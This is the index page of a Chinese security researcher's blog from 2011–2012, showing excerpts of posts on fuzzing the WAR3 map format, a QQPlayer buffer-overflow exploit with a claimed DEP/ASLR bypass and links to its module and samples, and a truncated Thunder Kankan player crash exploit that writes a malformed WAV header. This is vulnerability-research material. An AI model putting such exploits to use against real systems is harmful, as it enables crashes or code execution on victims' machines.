CQ-CSER

Computer enthusiast

2012

Posted on | January 15, 2012 | No Comments

Read more

WAR3 format

Posted on | December 12, 2011 | No Comments

Originally I was looking at the w3g (replay) format; see the following:

http://w3g.deepnode.de/files/w3g_format.txt

Roughly it contains these parts:
version header
compressed data

Once decompressed, it contains the various timestamps, actions and so on. ZLIB is used for decompression.
/////////////////////////////////////////////////////////////////////////////////////////////////////
Later I thought about it: a map is a better target than a replay. Opened one at random:

00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W….鍙槸鍙
00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?
00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?
00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?……….
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; …………….
00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. ….4Vx….
00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@…….
00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $…?..?..?..
00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %…T…?..?..
My guess is that it consists of a file header plus an MPQ2 section. We casually changed the numbers after "MPQ" (as above, to 1234567811111111) and opened it with WAR3; sure enough it crashed, once with an out-of-memory error and once with an exception. Bold guess: it reads the value directly and allocates memory based on it?
Read more

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

Posted on | November 21, 2011 | No Comments

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb
Samples:

http://115.com/file/cl3naedv

http://115.com/file/aqu3qzmk

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
# Date: 2011,11,21
# Author: hellok(warptencq[at]gmail.com)
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe
# Version: 32_845(lastest)
# Tested on: WIN7 Read more

thunder_kankan_stack_overflow/dos exploit

Posted on | November 17, 2011 | No Comments

# Banner is printed as a string; the leading "#" characters are part of the ASCII art, not comments.
print("""
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0      ___           ___           ___       ___       ___           ___     1
#1     /\__\         /\  \         /\__\     /\__\     /\  \         /\__\    0
#0    /:/  /        /::\  \       /:/  /    /:/  /    /::\  \       /:/  /    1
#1   /:/__/        /:/\:\  \     /:/  /    /:/  /    /:/\:\  \     /:/__/     0
#0  /::\  \ ___   /::\~\:\  \   /:/  /    /:/  /    /:/  \:\  \   /::\__\____ 1
#1 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/    /:/__/    /:/__/ \:\__\ /:/\:::::\__\0
#0 \/__\:\/:/  / \:\~\:\ \/__/ \:\  \    \:\  \    \:\  \ /:/  / \/_|:|~~|~   1
#1      \::/  /   \:\ \:\__\    \:\  \    \:\  \    \:\  /:/  /     |:|  |    0
#0      /:/  /     \:\ \/__/     \:\  \    \:\  \    \:\/:/  /      |:|  |    1
#1     /:/  /       \:\__\        \:\__\    \:\__\    \::/  /       |:|  |    0
#0     \/__/         \/__/         \/__/     \/__/     \/__/         \|__|    1
#1                                                                            0
#0  [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit       1
#1  [+] Software Link: dl.xunlei.com/xmp.html                                 0
#0  [+] Software:  Thunder kankan player                                      1
#1  [+] Version :   4.8.3.840(last)                                           0
#0  [+] Tested On:  WIN 7                                                     1
#1  [+] Code by:  hellok(warptencq@gmail.com)                                 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1
""")

filepath = "exploit.wav"

# Bytes written to the sample file: a RIFF chunk header ("RIFF"), the chunk size
# 0x2020b862 (little-endian), the "WAVE" form type and the start of the "fmt " chunk.
# The excerpt ends here; the rest of the original file body is not shown on this page.
data = b'\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20'

with open(filepath, "wb") as f:
    f.write(data)

print("Done..")

Read more

Blogs, Feeds, Guides & Links[zz]

Posted on | November 13, 2011 | No Comments

Original: http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html
And, by the way, FK GFW.
Especially recommended: the series at http://j00ru.vexillium.org/?p=893 Read more

Notes

Posted on | November 2, 2011 | No Comments

Read more

recent life

Posted on | October 25, 2011 | No Comments


Read more

darungrim

Posted on | October 15, 2011 | No Comments

DarunGrim is a free binary diffing tool. Read more

qtweb3.7.2

Posted on | October 5, 2011 | 2 Comments

Read more

samba4_smbclient_linux_winnt_share_file

Posted on | September 22, 2011 | 1 Comment

Read more

This blog is published under a Creative Commons license requiring attribution, non-commercial use and share-alike. Reposting its content is likewise subject to the "Attribution-NonCommercial-ShareAlike" Creative Commons terms.